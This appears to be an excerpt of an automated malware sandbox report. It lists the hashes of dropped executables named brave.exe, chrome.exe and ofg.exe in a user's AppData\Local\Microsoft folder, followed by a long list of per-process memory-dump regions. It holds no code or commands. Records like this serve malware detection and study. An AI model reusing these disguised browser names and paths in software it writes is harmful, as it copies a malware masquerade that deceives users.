                                              ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

                                            • \Users\Admin\AppData\Local\Microsoft\brave.exe

                                              Filesize

                                              2.8MB

                                              MD5

                                              9253ed091d81e076a3037e12af3dc871

                                              SHA1

                                              ec02829a25b3bf57ad061bbe54180d0c99c76981

                                              SHA256

                                              78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

                                              SHA512

                                              29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

                                            • \Users\Admin\AppData\Local\Microsoft\chrome.exe

                                              Filesize

                                              6.8MB

                                              MD5

                                              73b9004ff373f3b7b2f595541deb5a02

                                              SHA1

                                              bbc01bab5ae8ed8db2359c3b8a81eed75db5c061

                                              SHA256

                                              b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7

                                              SHA512

                                              908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4

                                            • \Users\Admin\AppData\Local\Microsoft\chrome.exe

                                              Filesize

                                              6.8MB

                                              MD5

                                              73b9004ff373f3b7b2f595541deb5a02

                                              SHA1

                                              bbc01bab5ae8ed8db2359c3b8a81eed75db5c061

                                              SHA256

                                              b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7

                                              SHA512

                                              908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4

                                            • \Users\Admin\AppData\Local\Microsoft\chrome.exe

                                              Filesize

                                              6.8MB

                                              MD5

                                              73b9004ff373f3b7b2f595541deb5a02

                                              SHA1

                                              bbc01bab5ae8ed8db2359c3b8a81eed75db5c061

                                              SHA256

                                              b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7

                                              SHA512

                                              908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4

                                            • \Users\Admin\AppData\Local\Microsoft\chrome.exe

                                              Filesize

                                              6.8MB

                                              MD5

                                              73b9004ff373f3b7b2f595541deb5a02

                                              SHA1

                                              bbc01bab5ae8ed8db2359c3b8a81eed75db5c061

                                              SHA256

                                              b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7

                                              SHA512

                                              908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4

                                            • \Users\Admin\AppData\Local\Microsoft\chrome.exe

                                              Filesize

                                              6.8MB

                                              MD5

                                              73b9004ff373f3b7b2f595541deb5a02

                                              SHA1

                                              bbc01bab5ae8ed8db2359c3b8a81eed75db5c061

                                              SHA256

                                              b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7

                                              SHA512

                                              908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4

                                            • \Users\Admin\AppData\Local\Microsoft\chrome.exe

                                              Filesize

                                              6.8MB

                                              MD5

                                              73b9004ff373f3b7b2f595541deb5a02

                                              SHA1

                                              bbc01bab5ae8ed8db2359c3b8a81eed75db5c061

                                              SHA256

                                              b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7

                                              SHA512

                                              908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4

                                            • \Users\Admin\AppData\Local\Microsoft\ofg.exe

                                              Filesize

                                              9KB

                                              MD5

                                              a169fb1a323c970f7a169b30657112cc

                                              SHA1

                                              5347dc5c0fe604f8527e336dd09a522fef0af9db

                                              SHA256

                                              97ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04

                                              SHA512

                                              8bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463

                                            • \Users\Admin\AppData\Local\Microsoft\ofg.exe

                                              Filesize

                                              9KB

                                              MD5

                                              a169fb1a323c970f7a169b30657112cc

                                              SHA1

                                              5347dc5c0fe604f8527e336dd09a522fef0af9db

                                              SHA256

                                              97ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04

                                              SHA512

                                              8bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463

                                            • memory/108-116-0x000007FEF3B50000-0x000007FEF4573000-memory.dmp

                                              Filesize

                                              10.1MB

                                            • memory/108-119-0x000007FEF2FF0000-0x000007FEF3B4D000-memory.dmp

                                              Filesize

                                              11.4MB

                                            • memory/108-131-0x0000000002854000-0x0000000002857000-memory.dmp

                                              Filesize

                                              12KB

                                            • memory/108-132-0x000000000285B000-0x000000000287A000-memory.dmp

                                              Filesize

                                              124KB

                                            • memory/108-134-0x000000000285B000-0x000000000287A000-memory.dmp

                                              Filesize

                                              124KB

                                            • memory/384-128-0x0000000000C50000-0x0000000000C58000-memory.dmp

                                              Filesize

                                              32KB

                                            • memory/416-203-0x000007FEBE420000-0x000007FEBE430000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/416-212-0x0000000036E10000-0x0000000036E20000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/416-199-0x00000000002F0000-0x0000000000313000-memory.dmp

                                              Filesize

                                              140KB

                                            • memory/416-220-0x00000000002F0000-0x0000000000313000-memory.dmp

                                              Filesize

                                              140KB

                                            • memory/416-226-0x0000000000890000-0x00000000008BA000-memory.dmp

                                              Filesize

                                              168KB

                                            • memory/464-230-0x00000000000E0000-0x000000000010A000-memory.dmp

                                              Filesize

                                              168KB

                                            • memory/464-236-0x0000000036E10000-0x0000000036E20000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/472-234-0x0000000000160000-0x000000000018A000-memory.dmp

                                              Filesize

                                              168KB

                                            • memory/472-235-0x0000000036E10000-0x0000000036E20000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/480-231-0x00000000002D0000-0x00000000002FA000-memory.dmp

                                              Filesize

                                              168KB

                                            • memory/480-238-0x0000000036E10000-0x0000000036E20000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/592-237-0x0000000036E10000-0x0000000036E20000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/592-232-0x00000000004A0000-0x00000000004CA000-memory.dmp

                                              Filesize

                                              168KB

                                            • memory/672-233-0x0000000000470000-0x000000000049A000-memory.dmp

                                              Filesize

                                              168KB

                                            • memory/672-241-0x0000000036E10000-0x0000000036E20000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/672-218-0x000007FEBE420000-0x000007FEBE430000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/972-142-0x000007FEF31B0000-0x000007FEF3BD3000-memory.dmp

                                              Filesize

                                              10.1MB

                                            • memory/972-143-0x000007FEF2650000-0x000007FEF31AD000-memory.dmp

                                              Filesize

                                              11.4MB

                                            • memory/972-144-0x0000000002504000-0x0000000002507000-memory.dmp

                                              Filesize

                                              12KB

                                            • memory/972-146-0x0000000002504000-0x0000000002507000-memory.dmp

                                              Filesize

                                              12KB

                                            • memory/972-147-0x000000000250B000-0x000000000252A000-memory.dmp

                                              Filesize

                                              124KB

                                            • memory/2164-183-0x0000000076FB0000-0x0000000077130000-memory.dmp

                                              Filesize

                                              1.5MB

                                            • memory/2164-162-0x0000000072E10000-0x00000000733BB000-memory.dmp

                                              Filesize

                                              5.7MB

                                            • memory/2164-166-0x0000000076FB0000-0x0000000077130000-memory.dmp

                                              Filesize

                                              1.5MB

                                            • memory/2164-168-0x0000000072E10000-0x00000000733BB000-memory.dmp

                                              Filesize

                                              5.7MB

                                            • memory/2184-189-0x0000000076DD0000-0x0000000076F79000-memory.dmp

                                              Filesize

                                              1.7MB

                                            • memory/2184-156-0x000007FEF3B50000-0x000007FEF4573000-memory.dmp

                                              Filesize

                                              10.1MB

                                            • memory/2184-180-0x000000000108B000-0x00000000010AA000-memory.dmp

                                              Filesize

                                              124KB

                                            • memory/2184-171-0x0000000076CB0000-0x0000000076DCF000-memory.dmp

                                              Filesize

                                              1.1MB

                                            • memory/2184-198-0x0000000076CB0000-0x0000000076DCF000-memory.dmp

                                              Filesize

                                              1.1MB

                                            • memory/2184-182-0x0000000076CB0000-0x0000000076DCF000-memory.dmp

                                              Filesize

                                              1.1MB

                                            • memory/2184-170-0x0000000076DD0000-0x0000000076F79000-memory.dmp

                                              Filesize

                                              1.7MB

                                            • memory/2184-194-0x000000000108B000-0x00000000010AA000-memory.dmp

                                              Filesize

                                              124KB

                                            • memory/2184-164-0x0000000001084000-0x0000000001087000-memory.dmp

                                              Filesize

                                              12KB

                                            • memory/2184-157-0x000007FEF2FF0000-0x000007FEF3B4D000-memory.dmp

                                              Filesize

                                              11.4MB

                                            • memory/2184-201-0x0000000076DD0000-0x0000000076F79000-memory.dmp

                                              Filesize

                                              1.7MB

                                            • memory/2312-159-0x0000000000400000-0x0000000000435000-memory.dmp

                                              Filesize

                                              212KB

                                            • memory/2312-186-0x0000000076FB0000-0x0000000077130000-memory.dmp

                                              Filesize

                                              1.5MB

                                            • memory/2312-196-0x0000000000150000-0x0000000000171000-memory.dmp

                                              Filesize

                                              132KB

                                            • memory/2312-184-0x0000000000400000-0x0000000000435000-memory.dmp

                                              Filesize

                                              212KB

                                            • memory/2312-255-0x0000000076FB0000-0x0000000077130000-memory.dmp

                                              Filesize

                                              1.5MB

                                            • memory/2312-167-0x0000000000400000-0x0000000000435000-memory.dmp

                                              Filesize

                                              212KB

                                            • memory/2456-191-0x0000000076DD0000-0x0000000076F79000-memory.dmp

                                              Filesize

                                              1.7MB

                                            • memory/2456-197-0x0000000076DD0000-0x0000000076F79000-memory.dmp

                                              Filesize

                                              1.7MB

                                            • memory/2456-193-0x0000000076CB0000-0x0000000076DCF000-memory.dmp

                                              Filesize

                                              1.1MB

                                            • memory/2456-188-0x0000000140000000-0x0000000140042000-memory.dmp

                                              Filesize

                                              264KB

                                            • memory/2456-229-0x0000000140000000-0x0000000140042000-memory.dmp

                                              Filesize

                                              264KB

                                            • memory/2456-181-0x0000000140000000-0x0000000140042000-memory.dmp

                                              Filesize

                                              264KB

                                            • memory/2456-256-0x0000000076DD0000-0x0000000076F79000-memory.dmp

                                              Filesize

                                              1.7MB

                                            • memory/2700-242-0x0000000000E80000-0x0000000000F00000-memory.dmp

                                              Filesize

                                              512KB

                                            • memory/2700-243-0x0000000000E80000-0x0000000000F00000-memory.dmp

                                              Filesize

                                              512KB

                                            • memory/2932-251-0x0000000000FB4000-0x0000000000FB7000-memory.dmp

                                              Filesize

                                              12KB

                                            • memory/2932-252-0x0000000000FBB000-0x0000000000FDA000-memory.dmp

                                              Filesize

                                              124KB

                                            • memory/2932-264-0x0000000000FBB000-0x0000000000FDA000-memory.dmp

                                              Filesize

                                              124KB

                                            • memory/2932-263-0x0000000000FB4000-0x0000000000FB7000-memory.dmp

                                              Filesize

                                              12KB

                                            • memory/3392-281-0x0000000140000000-0x00000001407F4000-memory.dmp

                                              Filesize

                                              8.0MB

                                            • memory/3392-280-0x0000000000000000-0x0000000001000000-memory.dmp

                                              Filesize

                                              16.0MB

                                            • memory/3392-279-0x0000000140000000-0x00000001407F4000-memory.dmp

                                              Filesize

                                              8.0MB

                                            • memory/188832-64-0x0000000075111000-0x0000000075113000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/188832-63-0x0000000000090000-0x00000000000B0000-memory.dmp

                                              Filesize

                                              128KB

                                            • memory/188832-62-0x0000000000090000-0x00000000000B0000-memory.dmp

                                              Filesize

                                              128KB

                                            • memory/188832-54-0x0000000000090000-0x00000000000B0000-memory.dmp

                                              Filesize

                                              128KB

                                            • memory/188832-77-0x0000000008410000-0x0000000008CAE000-memory.dmp

                                              Filesize

                                              8.6MB

                                            • memory/188832-56-0x0000000000090000-0x00000000000B0000-memory.dmp

                                              Filesize

                                              128KB

                                            • memory/188868-102-0x0000000002ABB000-0x0000000002ADA000-memory.dmp

                                              Filesize

                                              124KB

                                            • memory/188868-98-0x000007FEF31B0000-0x000007FEF3BD3000-memory.dmp

                                              Filesize

                                              10.1MB

                                            • memory/188868-103-0x0000000002AB4000-0x0000000002AB7000-memory.dmp

                                              Filesize

                                              12KB

                                            • memory/188868-104-0x0000000002ABB000-0x0000000002ADA000-memory.dmp

                                              Filesize

                                              124KB

                                            • memory/188868-97-0x000007FEFB7F1000-0x000007FEFB7F3000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/188868-101-0x000000001B7B0000-0x000000001BAAF000-memory.dmp

                                              Filesize

                                              3.0MB

                                            • memory/188868-99-0x000007FEF2650000-0x000007FEF31AD000-memory.dmp

                                              Filesize

                                              11.4MB

                                            • memory/188868-100-0x0000000002AB4000-0x0000000002AB7000-memory.dmp

                                              Filesize

                                              12KB

                                            • memory/189152-192-0x00000000000C0000-0x00000000000E1000-memory.dmp

                                              Filesize

                                              132KB

                                            • memory/189152-190-0x00000000000A0000-0x00000000000BB000-memory.dmp

                                              Filesize

                                              108KB

                                            • memory/189152-78-0x0000000000E90000-0x000000000172E000-memory.dmp

                                              Filesize

                                              8.6MB

                                            • memory/189152-175-0x000000006EFB0000-0x000000006EFC0000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/189152-172-0x00000000000A0000-0x00000000000BB000-memory.dmp

                                              Filesize

                                              108KB

                                            • memory/189152-160-0x0000000000E90000-0x000000000172E000-memory.dmp

                                              Filesize

                                              8.6MB

                                            • memory/189152-253-0x00000000000C0000-0x00000000000E1000-memory.dmp

                                              Filesize

                                              132KB

                                            • memory/189180-83-0x0000000001000000-0x0000000001008000-memory.dmp

                                              Filesize

                                              32KB

                                            • memory/189216-95-0x00000000739D0000-0x0000000073F7B000-memory.dmp

                                              Filesize

                                              5.7MB

                                            • memory/189216-92-0x00000000739D0000-0x0000000073F7B000-memory.dmp

                                              Filesize

                                              5.7MB

                                            • memory/189344-178-0x000000006EFB0000-0x000000006EFC0000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/189344-254-0x0000000000C70000-0x0000000000C91000-memory.dmp

                                              Filesize

                                              132KB

                                            • memory/189344-195-0x0000000000C70000-0x0000000000C91000-memory.dmp

                                              Filesize

                                              132KB